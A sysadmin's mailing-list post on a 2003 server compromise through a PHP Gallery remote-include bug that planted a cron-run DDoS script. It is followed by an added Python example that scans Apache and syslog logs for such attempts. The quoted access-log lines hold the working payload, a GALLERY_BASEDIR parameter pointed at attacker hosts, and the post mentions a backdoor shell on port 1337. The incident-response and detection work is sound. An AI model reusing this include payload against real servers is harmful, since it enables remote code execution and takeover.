I've gotten some e-mails from people who were infected with .ncsdrecover but it looks like my post is the only thing accessible via google when you find it, so I thought that I would report back publicly with what I found was responsible for it and how it got removed.
Basically people told me to look in my logs and I found activity in the syslog indicating when the cron job was first added, then I searched through my apache access logs for that same time and found they were exploiting a bug in php gallery on a site that had been left up. It basically allows you to set the directory to be an external site and then you can run whatever the webserver will allow you to. In this case they upload a file to /tmp or /var/tmp, as they did after I merely killed the file and removed it. Then it adds a cron job to run the file, in this case .ncsdrecover, hourly. If you find the access log for the same time then you might see something like this:

access.log:216.72.155.74 - - [16/Jun/2003:05:44:31 -0500] "GET /ara/page/gallery/errors/configmode.php?GALLERY_BASEDIR=http://vddos.tripod.com/ HTTP/1.0" 403 306 "-" "Mozilla 5.0 [en-US]"
access.log:195.68.95.210 - - [17/Jun/2003:12:25:15 -0500] "GET /ara/page/gallery/errors/configmode.php?GALLERY_BASEDIR=http://ddos31337.tripod.com/ HTTP/1.0" 403 306 "-" "Mozilla 5.0 [en-US]"
access.log:195.68.95.210 - - [17/Jun/2003:18:48:05 -

It looks like they were still trying to infect me yesterday, but I had put www-data on cron.deny and thus it prevented the script from being run. I think that a lot of people are probably falling prey to this DDOS script right now based upon e-mails I've received from people. Shouldn't the apache user be automatically denied from running cron jobs as a matter of security principle by default?

I have a question as to how safe a box is after it has been compromised by this perl script. I believe it opens up a shell account at 1337, but it shouldn't give them root access or the ability to log in as the web user at most, should it? Cuz if so that would be bad news for a lot of people who got hacked via this. Regardless, I upgraded my kernel to the new version; is there anything else I should do to ensure there were no backdoors implemented by this?
Also thanks for all of the initial help and responses I received. The debian community is truly a great example of mutual aid in effect.

Robert Ebright
sysadmin at azone.org

The script is posted on the below link if anybody who knows perl wants to review it.
http://archives.neohapsis.com/archives/linux/debian/2003-q2/0898.html
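The investigation described in the post (find the moment the cron job appeared in syslog, then look in the apache access log around that time for requests that point GALLERY_BASEDIR at an external site) can be scripted. The following is an added example written for this page, not code from the post or from the Gallery project. It assumes Apache's combined log format (with the optional "access.log:" prefix grep adds), treats any query-string value that is an absolute http/https/ftp URL as a remote-include attempt, and reads the cron modification time from a constructed vixie-cron syslog line; because syslog lines carry no year or timezone, both are supplied by the caller.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format, optionally prefixed by "filename:" as grep -H prints it.
# IPv4 only, which is what the post's log shows.
LOG_RE = re.compile(
    r'^(?:[^\s:]+:)?(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
# A query parameter whose decoded value is an absolute URL is the signature of a
# remote file include; parse_qsl URL-decodes first, so %68ttp:// is caught too.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)
# vixie-cron logs a crontab replacement as "crontab[pid]: (user) REPLACE (user)".
SYSLOG_RE = re.compile(
    r'^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<hms>\d\d:\d\d:\d\d) \S+ '
    r'crontab\[\d+\]: \((?P<user>[^)]+)\) REPLACE'
)

# Sample input: two access-log lines quoted from the post (line-wrap damage removed),
# one constructed benign request, and the truncated third line exactly as the post has it.
SAMPLE_ACCESS = [
    'access.log:216.72.155.74 - - [16/Jun/2003:05:44:31 -0500] "GET /ara/page/gallery/errors/configmode.php?GALLERY_BASEDIR=http://vddos.tripod.com/ HTTP/1.0" 403 306 "-" "Mozilla 5.0 [en-US]"',
    'access.log:195.68.95.210 - - [17/Jun/2003:12:25:15 -0500] "GET /ara/page/gallery/errors/configmode.php?GALLERY_BASEDIR=http://ddos31337.tripod.com/ HTTP/1.0" 403 306 "-" "Mozilla 5.0 [en-US]"',
    'access.log:192.0.2.10 - - [17/Jun/2003:12:10:00 -0500] "GET /ara/page/gallery/index.php?album=example HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    'access.log:195.68.95.210 - - [17/Jun/2003:18:48:05 -',
]
# Constructed syslog line showing the web user's crontab being replaced (hostname is made up).
SAMPLE_SYSLOG = [
    'Jun 17 12:25:20 webhost crontab[4242]: (www-data) REPLACE (www-data)',
]
LOCAL_TZ = timezone(timedelta(hours=-5))  # matches the -0500 offset in the access log


def parse_line(line):
    """Parse one access-log line; return None for lines that are truncated or not in the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['time'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    rec['status'] = int(rec['status'])
    return rec


def remote_include_attempts(lines):
    """Flag requests where any query parameter carries an absolute URL (remote file include)."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        query = urlsplit(rec['target']).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits.append({
                    'ip': rec['ip'], 'time': rec['time'], 'param': key, 'url': value,
                    'status': rec['status'],
                    # A 4xx/5xx means the server refused it; a 200 means the include likely ran.
                    'blocked': rec['status'] >= 400,
                })
    return hits


def cron_replace_times(syslog_lines, year, tz):
    """Return (user, datetime) for each crontab replacement seen in syslog."""
    out = []
    for line in syslog_lines:
        m = SYSLOG_RE.match(line)
        if m:
            t = datetime.strptime(f"{m['mon']} {m['day']} {year} {m['hms']}", '%b %d %Y %H:%M:%S')
            out.append((m['user'], t.replace(tzinfo=tz)))
    return out


def entries_near(lines, when, window=timedelta(minutes=10)):
    """Access-log records within +/- window of a syslog event, oldest first."""
    out = [r for r in map(parse_line, lines) if r and abs(r['time'] - when) <= window]
    return sorted(out, key=lambda r: r['time'])


if __name__ == '__main__':
    for user, when in cron_replace_times(SAMPLE_SYSLOG, 2003, LOCAL_TZ):
        print(f'crontab for {user} replaced at {when}; requests around that time:')
        for rec in entries_near(SAMPLE_ACCESS, when, timedelta(minutes=5)):
            print(f"  {rec['time']} {rec['ip']} {rec['target']} -> {rec['status']}")
    for hit in remote_include_attempts(SAMPLE_ACCESS):
        print(f"remote include: {hit['ip']} {hit['param']}={hit['url']} blocked={hit['blocked']}")
```

Running it against a real log is a matter of replacing the sample lists with the file contents; the status column tells you whether the include was refused (403 in the post's lines) or served, which is the difference between an attempt and a compromise.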